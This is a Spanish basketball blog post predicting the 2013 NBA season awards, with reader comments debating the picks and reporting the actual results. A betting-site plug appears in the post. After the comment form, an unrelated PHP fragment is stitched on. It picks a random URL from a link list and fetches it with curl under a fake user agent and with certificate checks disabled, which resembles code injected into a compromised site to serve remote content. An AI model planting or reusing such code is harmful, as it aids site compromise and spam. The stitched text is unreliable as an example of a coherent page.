Pronósticos a los premios 2013

22 de April de 2013 por txusma

2 de los 6 premios parecen no tener discusión pero igualmente David Stern no has pedido, como cada año, que le enviemos nuestras propuestas para tenerlas muy en cuenta. Ya que nos hemos molestado en redactar el documento os lo hacemos extensivo para que nos critiquéis todo lo que queráis. Lo habitual, vamos.

Creo que aún estáis a tiempo de apostar alguna cosa en las páginas especializadas (como por ejemplo William Hill apuestas deportivas). Habrá que darse prisa porque hoy mismo pueden anunciar ya el primer premio de la temporada.

Most Valuable Player

Si este año Lebron James no es escogido como MVP de forma unánime creo que habrá llegado el momento de obligar a que los más de 120 votantes pasen un control de alcoholemia antes de enviar sus elecciones.  Podemos empezar por repasar sus números: 26’8 puntos, 8’0 rebotes, 7’3 asistencias y 1’7 robos por partido con un 56’5% de acierto en tiros de campo y un 40’3% de acierto en tiros de 3. Pero la dimensión de Lebron James esta temporada ha ido más allá de las simples estadísticas. Los Miami Heat han acabado como líderes de la liga regular y han encadenado 23 partidos consecutivos ganando, la 2ª mejor racha de la historia. Muchos de estos partidos los ha ganado Lebron James en esos últimos cuartos en los que hasta hace no mucho se decía que se escondía. Sus exhibiciones en los minutos finales han dejado ya, incluso, de sorprendernos. Permitidme que recuerde para acabar de enumerar sus logros esos 29’7 puntos por partido con un 64% de acierto que consiguió durante el mes de Febrero.

La grandeza de Lebron se hace más patente cuando me doy cuenta de que estoy pidiendo que nadie vote a Kevin Durant como primera opción. Un jugador que anota 28’1 puntos por partido, capaz de capturar cerca de los 8 rebotes y aún asistir en más de 4 ocasiones. Todo con unos porcentajes de ensueño (51% en TC, 41% en T3 y 90% en TL) y en un equipo que ha terminado como el mejor de la durísima conferencia Oeste.

La diferencia abismal entre estos dos jugadores antológicos y el resto es palpable. Kobe Bryant, Chris Paul, Tim Duncan, Carmelo Anthony, James Harden… todos quedan empequeñecidos ante los 2 monstruos. Algún día diremos aquello de “Yo vi jugar a Lebron y Durant”. Seguro. 

Most Improved Player

Interesantísima elección, una de las más abiertas. Veo dos candidatos por encima del resto. Por un lado, Paul George. El jugador de los Pacers ha asumido el rol de líder de su equipo en ausencia de Danny Granger y ha respondido a la perfección. Ha jugado 8 minutos más por partido que la temporada pasada pero el simple aumento de tiempo no explica la mejora en la gran mayoría de apartados estadísticos que lo han llevado a disputar su primer All-Star. A su favor juega además el buen papel de Indiana. Si en la NBA quieren premiar a los Pacers de alguna manera aquí tendrían un claro candidato. El otro hombre sería Nikola Vucevic. En una franquicia acostumbrada a los grandes pívots, el montenegrino ha dejado su nombre grabado a fuego gracias a sus increíbles actuaciones como los 29 rebotes frente los Heat en diciembre o los 30 puntos y 20 rebotes frente los Bucks de este mismo Abril. Se ha quedado a un paso de ser el máximo reboteador del campeonato y su mejoría es más que evidente. En su contra juega el pobre balance de los Magic y el hecho de que ha disputado el doble de minutos más por partido que la temporada pasada.

Un escalón por debajo encontramos a jugadores como Larry SandersGreivis Vasquez, Omer AsikJrue Holiday. El jugador de los Bucks ha aparecido prácticamente de la nada para convertirse en todo un bastión defensivo, un jugador capaz de promediar casi 3 tapones por partido. Vasquez ha disputado todos los partidos de titular y ha mejorado todos sus números. Ha anotado, repartido asistencias, conseguido triples dobles… Si su equipo hubiera hecho mejor papel sería uno de los grandes candidatos. El caso de Asik es similar al de Vucevic con sutiles diferencias. Sus actuaciones no han sido tan espectaculares (aunque tiene muy buenas medias) pero en cambio, su equipo ha acabado mucho más arriba. Holiday hubiera sido aspirante claro si la temporada se hubiera acabado en febrero. Sus registros y los de su equipo a partir del All-Star dejan mucho que desear, lo que le elimina prácticamente de la lucha. Una lástima para un jugador que ha dado un salto de nivel espectacular.

Rookie of the Year

En toda la historia del premio sólo 3 jugadores han sido escogidos “Rookie of the Year” de forma unánime: Ralph Sampson (1984), David Robinson (1990) y Blake Griffin (2011). Este año debería unirse un cuarto nombre a la lista: el de Damian Lillard. Su superioridad sobre sus compañeros de promoción ha sido prácticamente humillante: mejor anotador, mejor asistente, líder en triples y tiros libres, tercero mejor ladrón, cuarto en dobles-dobles y primer rookie desde Chamberlain y Hayes en liderar la liga en minutos jugados. Para Lillard no ha existido el Rookie Wall, ha seguido liderando a los Blazers igual que lo ha hecho durante todo el año, con autoridad y repartiendo más de una exhibición, la última ante los Lakers hace unos días en la que anotó 38 puntos. El All-Star puede tener invitado para muchos años.

De hecho, las dudas aparecen cuando hay que decidir quién le acompañará en el mejor quinteto. Hay 2 jugadores claros: Anthony Davis y Bradley Beal. El de los Hornets ha disputado una buena campaña y lidera a los rookies en los apartados de rebotes, tapones, robos y dobles-dobles pero aunque apunta a fuerza defensiva, todos esperábamos un poco más de él. Cierto es que la gran cantidad de lesiones que ha sufrido tampoco ha ayudado. La temporada de Beal ha estado llena de altibajos. Su inicio de temporada nos dejó a todos muy fríos, completamente decepcionados, pero en este 2013, con la vuelta de John Wall, se ha destapado con un anotador letal que recuerda en algunos momentos a James Harden. De hecho, es uno de los mejores escoltas de la liga en cuanto a acierto con 5 segundos o menos en el reloj de posesión. Acaba la temporada con un cúmulo de lesiones pero las sensaciones son buenas.

Buscamos 2 jugadores más. Harrison Barnes debería ser uno de ellos. Este año los Warriors han competido al máximo y han confiado durante todo el año la posición de alero al ex de North Carolina, por algo será. Ha destacado en la faceta defensiva y en ataque ha estado algo inconsistente pero ha dejado pinceladas muy interesantes, sobretodo desde el poste bajo. La última posición se la juegan Andre Drummond y Dion Waiters. Ambos han estado por encima de las expectativas, sobretodo el de los Pistons, pero han jugado en equipos muy poco competitivos. Yo me inclino por el de los Cavaliers.

Sixth Man of the Year

Parece haber un candidato claro por encima del resto. JR Smith ha completado la mejor temporada de su carrera y es uno de los grandes responsables del gran papel que han jugado los New York Knicks. Ha promediado 18’1 puntos y 5’3 rebotes por partido sin salir ni un solo partido de titular aunque al final ha jugado 33 minutos por noche. Su nivel a partir del All-Star ha sido alucinante: 21’3 puntos, 5’9 rebotes y 2’6 asistencias por encuentro. Sólo Kobe Bryant y James Harden están por encima suyo en cuanto a escoltas se refiere. Al resto puede mirarlos cara a cara.

De todas maneras creo que no habría que olvidar a Jamal Crawford. El jugador de los Clippers empezó la temporada como un tiro y ha mantenido un buen nivel durante todo el año. Es cierto que en los últimos meses ha hecho menos ruido pero acaba con 16’5 puntos de media en 29 minutos de juego. Su concurso también es esencial para un equipo que ha conseguido acabar cuarto en el salvaje Oeste.

Tras estos dos jugadores situaría a Kevin MartinJarrett Jack y Nate Robinson. El de los Thunder ha demostrado que no es James Harden pero ha cumplido con el rol que se le demandaba. Demasiado irregular, eso sí. En cambio el de los Warriors ha jugado partidos (recuerdo uno brutal ante los Lakers en diciembre) en los que sí parecía James Harden. Su pico de forma en diciembre y los dos primeros meses de 2013 parecía que le aupaban entre los favoritos a este premio pero su bajón en marzo y abril ha sido clamoroso. De hecho, los Warriors lo han notado mucho. Robinson ha estado ahí todo el año pero ha jugado como lo viene haciendo toda su carrera: hoy parezco Jordan y mañana, una escopeta de feria. Eso sí, los días que parece Jordan son de los que se merecen pagar una entrada.

Finalmente, Ryan Anderson, JJ ReddickJeff Green, sobretodo este último, podrían recibir algún voto.

Defensive Player of the Year

Pues atención que creo que Marc Gasol puede tener muchas opciones de llevarse el premio. Más allá de sus números (7’8 rebotes, 1’7 tapones, 1 robos) el mediano de los Gasol se ha convertido en todo un entrenador en la cancha. Es la piedra angular sobre la que descansa toda la defensa de los Grizzlies, la mejor del campeonato. Ordena a sus compañeros, les cubre las espaldas, toma decisiones correctas en milésimas de segundo… Su importancia trasciende las frías estadísticas.

Sus máximos rivales pueden ser su compañero de equipo Tony Allen y el gran, eterno Tim Duncan. Supongo que el escolta de los Grizzlies, que es un gran defensor, no ganará el premio justamente por ser compañero de Gasol pero Duncan, a sus 37 años, tiene la oportunidad. Ha cuajado la mejor temporada de los últimos años y presenta unos números de escándalo: 9’9 rebotes y 2’7 tapones. No me extrañaría que se llevara el galardón como reconocimiento a su fenomenal campaña. Yo tampoco descartaría a Tyson Chandler aunque es más que posible que estos últimos partidos de baja le hayan restado opciones. Mientras ha estado sano ha mantenido el tono defensivo de la anterior campaña y ha acabado jugando más partidos. ¿Porqué debería ser diferente?

Lebron James, Joakim Noah, Serge Ibaka y Andre Iguodala seguro que reciben algún voto y se lo merecen todos ellos.

Coach of the Year

A mi cuando me dicen la palabra entrenador y pienso en la NBA me viene siempre a la cabeza Gregg Popovich. A muchos no les gustará su estilo o estará en contra de sus rotaciones pero creo que es de los entrenadores que más y mejor ejercen su papel. Solamente por el pulso que protagonizó con el todopoderoso David Stern ya merecería optar al galardón, aunque justo por eso me temo que no tiene ninguna posibilidad. Conoce su equipo, sabe de sus puntos débiles y ya desde el primer minuto de la temporada actúa en consecuencia. No se limita a poner a sus mejores jugadores en pista como hace, por ejemplo, Erik Spoeltra. Es el entrenador del mejor equipo del año pero no parece que haya jugado un papel fundamental. El debate sobre quién es el jugador franquicia de los Heat ha caído por su propio peso y a partir de ahí, con Lebron James en modo legendario, todo es más fácil.

Sigamos repasando candidatos. George Karl ha construido un equipo rocoso a la vez que alegre que se ha hecho muy fuerte en casa. Ha explotado al máximo las rotaciones y ha respondido a la perfección a las lesiones que han sufrido. Desgraciadamente, el discutible papel de los Nuggets fuera de casa le puede restar alguna opción. También podríamos tener en cuenta a Frank Vogel, que ha cambiado a los Pacers desde que se sentó en el banquillo y que los ha convertido en un equipo ganador desde la defensa y la capacidad reboteadora. ¿Qué decir que Mike Woodson? Otro entrenador que ha mutado a un equipo. Los Knicks son ahora un equipo que aspira al anillo y buena parte de la culpa la tiene él. No menos méritos parecen tener Lionel Hollins y Tom Thibodeau. Hollins ha convertido a los Grizzlies en una máquina defensiva y Thibodeau ha hecho competitivo a un conjunto que ha tenido a su máxima estrella lesionada todo el año.

Hay mucho para elegir. Si de mí dependiera se lo daría a Gregg Popovich otra vez, y después consideraría a Hollins y Thibodeau para la 2ª posición. Como sabemos que Popovich y Thibodeau no lo van a ganar  me decanto por Lionel Hollins, aunque George Karl podría tener muchas opciones.

Executive of the Year

Doy sólo dos opciones: Bob Myers, de los Golden State Warriors, y Daryl Morey, de los Houston Rockets.

Golden State ha cuajado una buena temporada y ha sido en buena parte por una serie de buenos movimientos llevados a cabo en verano. La llegada de Jarrett Jack y Carl Landry han sido fundamentales, así como la elección de Harrison Barnes, titular todo el año. No fue fácil traspasar a Monta Ellis pero, a pesar de que Andrew Bogut ha estado lesionado la mayor parte del año, el resultado parece haber sido positivo.

Qué decir de los Rockets… El 27 de Octubre de 2012, los Rockets parecían los máximos candidatos al número 1 del draft. Un día después, Daryl Morey soltaba la bomba y James Harden recalaba en el equipo. Increíble traspaso con increíble resultado final. James Harden se ha destapado como figura de primer nivel, el contrato de Omer Asik no solo no parece malo sinó que hay días que se ve como un chollo, Jeremy Lin ha cuajado una temporada más que digna y ha aportado lo que se esperaba de él, sus elecciones de draft han sido muy interesantes, se ha hecho con Thomas Robinson a mitad de temporada y lo más espectacular: ¡este verano tiene dinero para fichar otro agente libre! ¡Santo súbito!

Comenta

31 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Txus: y James Harden en el Most Improved?

      Citar

  2. Jose Luis dice:
    #2

    MVP: se lo darán a LeBron, pero dudo mucho que unánime. Que Durant, en unos Thunder post-Harden, haya sido capaz de llevarlos al primer puesto de la dura conferencia Oeste dice mucho. Ha evolucionado su juego y sin duda se llevará votos.

    MIP: George, Vucevic, Vasquez… no creo que Asik/Holiday/Sanders obtengan muchos votos. George se ha echado a la espalda a los Pacers y meterlos 3ºs en el Este, con la baja de Granger, y mucho tiempo estuvieron 2ºs. Además triple-doble ayer y All-Star. Casi asegurado para él.

    ROY: Lillard y no hay más que hablar. Unánime espero.

    SixthMan: Smith y tampoco hay mucho más que hablar. Crawford ha bajado el nivel y los Clippers nunca han sido equipo suyo, mientras Smith es el 2º mejor anotador de los Knicks, en muchas ocasiones tan o más importante que Carmelo.

    DPOY: siempre subjetivo. No sé quién se lo llevará, muchos candidatos. Quizá pase con Allen-Marc-Duncan lo que pasó con Iniesta-Xavi-Messi en el balón de oro. Reparto de méritos de los dos primeros y se lo lleva el tercero.

    Después sigo.

      Citar

  3. HisRoyalAirness dice:
    #3

    Y con respecto a Lebron sí, es el mejor de la liga sin duda, pero para mí no es el MVP
    En una conferencia absolutamente lamentable con Rondo, Rose, Bynum, Hibbert y otros tantos lesionados y habiendo debilitado a uno de los rivales principales con la adquisición de Ray Allen qué mérito tiene quedar de primeros? Yo no me olvido de que se unió a 2 jugadores franquicia para llegar a esto. 2 titulares del All-Star.
    Admito por completo su superioridad como jugador más dotado pero no creo que sea el más valioso. Es más, creo que si cambiamos a Lebron por Durant o Melo los Heat estarían en el mismo sitio.

    Para mí el MVP de facto es Tim Duncan. Con ese equipo, en esa conferencia y a sus años ha sido factor diferencial absoluto. No todo son los números

      Citar

  4. txusma dice:
    #4

    HisRoyalAirness:
    Txus: y James Harden en el Most Improved?

    Reconozco que me he olvidado un poco de él aunque no lo acabaría de considerar para el premio. Aparte del aumento del número de minutos hay un claro cambio de rol. Es decir, James Harden es igual de bueno que el año pasado pero ha jugado más y sobretodo ha tirado mucho más, 7 veces más por partido (con peores porcentajes todo hay que decirlo, fruto tb de su nuevo rol). Diría que más que mejorar, Harden ha confirmado lo que muchos sospechábamos: que era un crack a la sombra de Durant y Westbrook.

      Citar

  5. HisRoyalAirness dice:
    #5

    txusma: Reconozco que me he olvidado un poco de él aunque no lo acabaría de considerar para el premio. Aparte del aumento del número de minutos hay un claro cambio de rol. Es decir, James Harden es igual de bueno que el año pasado pero ha jugado más y sobretodo ha tirado mucho más, 7 veces más por partido (con peores porcentajes todo hay que decirlo, fruto tb de su nuevo rol). Diría que más que mejorar, Harden ha confirmado lo que muchos sospechábamos: que era un crack a la sombra de Durant y Westbrook.

    No, si estoy de acuerdo, pero yo creo que pueden dárselo a pesar de eso

      Citar

  6. Viva_Dirk dice:
    #6

    Esto me suena. Decir que los Heat estarian en el mismo sitio con Durant o Melo en lugar de Lebron me recuerda a cuando se decia en el 2000 que los Lakers ganarian igual con McGrady o Carter en el puesto de Kobe. Lebron esta dominando la competición, nos guste o no, como en su momento hicieron los mas grandes que se nos vengan a la cabeza, sin duda el MVP debe ser para el.

      Citar

  7. HisRoyalAirness dice:
    #7

    Viva_Dirk:
    Esto me suena. Decir que los Heat estarian en el mismo sitio con Durant o Melo en lugar de Lebron me recuerda a cuando se decia en el 2000 que los Lakers ganarian igual con McGrady o Carter en el puesto de Kobe. Lebron esta dominando la competición, nos guste o no, como en su momento hicieron los mas grandes que se nos vengan a la cabeza, sin duda el MVP debe ser para el.

    No digo que no pero muy pronto nos hemos olvidado de un tal Dwayne Wade

      Citar

  8. Viva_Dirk dice:
    #8

    HisRoyalAirness: No digo que no pero muy pronto nos hemos olvidado de un tal Dwayne Wade

    Pero es que ha sido Lebron el que se ha cargado partidos el solo en los últimos cuartos este año, y el que le da un funcionamiento distinto al equipo haciendo todo lo que se puede hacer en una cancha.

    Y todos los jugadores que podrian aspirar a MVP, sea Durant o Duncan también cuentan con jugadores que han hecho temporadas buenísimas, Westrbook y Parker.

      Citar

  9. HisRoyalAirness dice:
    #9

    Viva_Dirk: Pero es que ha sido Lebron el que se ha cargado partidos el solo en los últimos cuartos este año, y el que le da un funcionamiento distinto al equipo haciendo todo lo que se puede hacer en una cancha.

    Y todos los jugadores que podrian aspirar a MVP, sea Durant o Duncan también cuentan con jugadores que han hecho temporadas buenísimas, Westrbook y Parker.

    Sí, todos tienen un escudero, no 2.
    No me interpretes mal, sé que Lebron es el mejor jugador que hay pero no le veo tanto mérito a lo que hace como a otros.

      Citar

  10. melo15 dice:
    #10

    Yo estoy con Denise, ademas que creo que esta mas solo de lo que realmente parece.
    Bosh no es ni una 1/3 parte de lo que era en Toronto, y Wade ya no es el del 2006, y aunque sigue siendo un pedazo de jugador, pero esta por encima de Parker o Westbrook?
    MVP indiscutible.
    Con los demas estoy bastante de acuerdo aunque a Lionel Hollins no se lo van a dar ni de broma porque tampoco lo merece. Veo a Popovich, Karl, Woodson, Spolestra y Thibodeau por encima de el.

      Citar

  11. txusma dice:
    #11

    melo15:
    Yo estoy con Denise, ademas que creo que esta mas solo de lo que realmente parece.

    Y con quien está Denise? Todavía no se ha manifestado 😀

    El argumento de Wade y Lebron se podría aplicar a Westbrook y Durant con la diferencia de que Westbrook ha hecho mejor temporada que el de Miami. Y bueno, Chris Bosh ha promediado 16’6 puntos y 6’8 rebotes. Serge Ibaka ha estado a un nivel similar.

    Lo de dárselo a Tim Duncan sería justicia poética y no sería yo el que me enfadaría.

      Citar

  12. Denise dice:
    #12

    txusma: Y con quien está Denise? Todavía no se ha manifestado

    jaja Ay Melo!!

    Solo por la racha que tuvo Lebron de 5 ó 6 partidos consecutivos por encima de los 30 puntos y mas de un 70% de acierto en tiros, ya merece el MVP. Para mí , actual nº1 de la Liga, y vale que tiene un equipazo rodeandole, pero el tio siempre aparece en el momento clave, no se está rajando en partidos importantes y asume bola cuando mas quema la pelota.

      Citar

  13. rumbero dice:
    #13

    Ya es oficial que el Sixth Man es para JR Smith. Muy merecido.
    De acuerdo con el resto, aunque yo me decantaría por Karl como Coach of the year. Terceros en el wild west, buena gestión de una plantilla sin ninguna mega estrella, ese récord como locales…Muchos pensábamos que estos Nuggets podían ser un muy buen equipo esta temporada y lo han conseguido en gran medida gracias a él.

    Un día habría que hacer como con los Razzies y los Oscar y elegir al peor defensor, rookie, entrenador…Estaría bastante divertido y seguro que más disputado 😀

      Citar

  14. Denise dice:
    #14

    rumbero:

    Un día habría que hacer como con los Razzies y los Oscar y elegir al peor defensor, rookie, entrenador…Estaría bastante divertido y seguro que más disputado

    Contando sólo a los jugadores de rotación, y NO a los fondos de armario que apenas tienen oportunidades tipo Darius Morris o Fab Melos de la vida…mi lista que propones es:

    Peor Defensor: Amare Stoudemire
    Peor Rookie: Thomas Robinson, un pick 5 que pasa por dos equipos, uno perdedor y otro a medio hacer, y ni fu ni fa en ambos.
    Peor Entrenador: Sí…el que todos pensais…Mike D’Antoni.
    Peor GM: El de los Bobcats.

      Citar

  15. Sancho88 dice:
    #15

    Pues sobre el sexto hombre, creo que el premio debería haberse compartido este año. JR Smith y Jamaal Crawford, los dos han hecho grandes cosas para sus equipos. Si miramos números, JR está un poco por encima, pero tampoco se puede decir, José Luis, que ha pegado un gran bajón Jamaal…

    Y en el MVP, yo voy a decir algo que no sera políticamente acertado: creo que también se debería compartir. Lebron y Durant tampoco se puede decir que uno haya jugado mejor que el otro. Lo siento pero no. Cuando hablamos de esos numerazos que tienen los dos, porque Lebron tenga más asistencias, no quiere decir que se tenga que llevar el premio de largo, sin opciones para Durant. Que lo compartan sería lo más justo.

    Y en el premio defensivo, dárselo a Marc sería injsutísimo estando DON TIM DUNCAN de por medio.

      Citar

  16. Txusma dice:
    #16

    Sancho88:

    Y en el premio defensivo, dárselo a Marc sería injsutísimo estando DON TIM DUNCAN de por medio.

    Pues ya suena Marc y te diré una cosa: si hay muchos blogs y medios especializados americanos que defienden que Marc Gasol ha de ser el DPY es que realmente ha sido superior a los demás en ese aspecto.

      Citar

  17. Esteban dice:
    #17

    marc es un gran jugador defensivo, pero la falta de lucidez en ese rubro le jugara en contra

    en america y para el publico en general vale mas la apariencia de superman de Howard, o las arengas de Chanlder luego de un tapon, o la convinacion de tamaño y agilidad de lebron james, que los fundamentos y trabajo silencioso que puede hacer marc

      Citar

  18. Chipi dice:
    #18

    Lebron es merecedor indicutible del MVP, pero me da pena que no se reconozca el temporadón que se han marcado Melo y Kobe.

    Y no voy a pronosticar nada más, ya que a principios de temporada puse a Jason Terry como sexto hombre en la porra. No, esto no es lo mío.

      Citar

  19. jose_dantley dice:
    #19

    Lo vas clavando, Txus ¡¡¡

    Yo sí hubiera tenido en consideración a Harden para MIP, al fin y al cabo es lo mismo que George, pero con traspaso. Aún así, está bien, como lo hubiera estado con Sanders aún más inesperado.

    El 6º indiscutible, Crawford bajó demasiado.

    El MVP igual, no sé si unánime, no diría tanto, al igual que el ROY.

    En el DPOY que se lo han dado a Marc Gasol no lo sé. No veo tantos partidos como para opinar, aunque si se lo hubieran dado a Duncan estaría perfecto también. Pero es un detalle que se lo den a Marc Gasol porque es una señal de que se valoran otras cosas que no el simple hachazo en un tapón.

    Quedará también el quinteto. LeBron y Durant obvios, Paul casi. Me queda decidir probablemente entre Harden y Kobe por un lado -con ventaja para Kobe por aquello de eso mismo- e imagino que Duncan será el center, con una opción para Marc Gasol

      Citar

  20. MagicJohnson32 dice:
    #20

    ¿En serio estáis discutiendo el MVP para LeBron? Jajaja, sois la leche…

    El premio de Marc como mejor defensor yo también lo tengo claro. Sí, Duncan es buenísimo, pero la influencia defensiva de Marc en los Grizzlies es brutal, siempre (y cuando digo siempre es siempre) defiende al mejor interior rival. Y los Grizzlies son de largo el equipo que menos puntos encaja, creo que unos 7 menos por partido que los Spurs.

    Lo que pasa es que es ridículo que Duncan no haya ganado jamás un premio como mejor defensor, y claro, ahora nos gustaría que lo recibiese. Es una pena, pero este año Marc lo merece.

    Ah, y el COY creo que debería ser Karl, pero ojo con Spoelstra.

      Citar

  21. txusma dice:
    #21

    Estamos repasando las apuestas que hicimos a principio de temporada y os voy a dar un dato:

    Con 61 apuestas y 3 premios sólo ha habido 4 aciertos. 4 aciertos en total!! Nadie acertó a Marc Gasol como DPY, sólo 1 a JR Smith y 3 a Paul George. Somos unos hachas!

      Citar

  22. Jose Luis dice:
    #22

    Tenemos el porvenir asegurado como futurólogos xD

      Citar

  23. txusma dice:
    #23

    Como comentaba: Damian Lillard nuevo ROY de forma unánime.

      Citar

  24. Jose Luis dice:
    #24

    Al final, como dije, LeBron no ha sido elegido de forma unánime. 1 voto para Carmelo Anthony

      Citar

  25. txusma dice:
    #25

    Jose Luis:
    Al final, como dije, LeBron no ha sido elegido de forma unánime. 1 voto para Carmelo Anthony

    El periodista que votó a Carmelo por encima de Lebron y Durant está en busca y captura.

      Citar

  26. Jose Luis dice:
    #26

    Y no me extraña jajajaja, pensaba que alguien votaría a Durant pero no a Melo. Esa racha por encima de 40 puntos, sin Stat, y todas las bajas han influido en su decisión.

      Citar

  27. MagicJohnson32 dice:
    #27

    COY 2013
    1º Karl (404)
    2º Spoelstra (190)
    3º Woodson (127)
    4º Popovich (120)
    5º Vogel (60)
    6º Hollins (55)
    7º M. Jackson (47)
    8º Thibodeau (40)
    9º McHale (17)
    10º Carlesimo (8)
    11º Del Negro (8)
    12º Drew (6)
    13º Rivers (4)
    14º Brooks (3)

      Citar

  28. Denise dice:
    #28

    MagicJohnson32:
    COY 2013
    1º Karl (404)
    2º Spoelstra (190)
    3º Woodson (127)
    4º Popovich (120)
    5º Vogel (60)
    6º Hollins (55)
    7º M. Jackson (47)
    8º Thibodeau (40)
    9º McHale (17)
    10º Carlesimo (8)
    11º Del Negro (8)
    12º Drew (6)
    13º Rivers (4)
    14º Brooks (3)

    Hollins y Brooks deberían estar más arriba.

      Citar

  29. rumbero dice:
    #29

    Hombre es que Brooks gustará más o menos, pero canta mucho habiendo quedado primeros en el oeste y viendo donde han puesto a Spoelstra

      Citar

  30. Josgel dice:
    #30

    ¿Y D´Antoni?

    ¿No tiene un voto ni del bromista de turno?

      Citar

  31. Txusma dice:
    #31

    rumbero:
    Hombre es que Brooks gustará más o menos, pero canta mucho habiendo quedado primeros en el oeste y viendo donde han puesto a Spoelstra

    Justo iba a comentar esto. Yo creo q en lugar d Spoeltra pones en los Heat a cualquier asistente de la nba y el resultado es muy parecido sinó el mismo.
    Y viendo lo d Brooks es q n se entiende.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>